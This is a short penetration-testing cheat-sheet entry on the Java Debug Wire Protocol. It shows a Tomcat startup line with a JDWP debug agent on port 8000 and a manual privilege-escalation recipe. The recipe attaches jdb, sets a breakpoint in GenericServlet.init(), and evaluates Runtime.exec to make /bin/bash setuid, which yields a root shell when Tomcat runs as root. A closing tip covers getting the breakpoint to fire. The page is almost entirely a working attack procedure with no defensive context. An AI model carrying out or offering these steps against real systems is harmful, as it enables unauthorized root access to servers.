Java Debug Wire Protocol (JDWP)
Startup #
This is included on tomcat startup parameters. Example.
/usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-
9.0.27/conf/logging.properties [...redacted...]
-agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n [...redacted...]
Attacks #
- Privesc RCE if tomcat is running as root - this finds the
java.lang.Runtime.getRuntime()
to invokeexec()
passing a string object
Manual Exploitation of RCE #
jdb -attach 127.0.0.1:8000
> stop in javax.GenericServlet.init()
> Set deferred breakpoint javax.servlet.GenericServlet.init()
main[1] eval new java.lang.Runtime().exec("chmod +s /bin/bash")
Tips #
- If exploit is not working, ensure that tomcat is hitting a breakpoint. For example restart tomcat.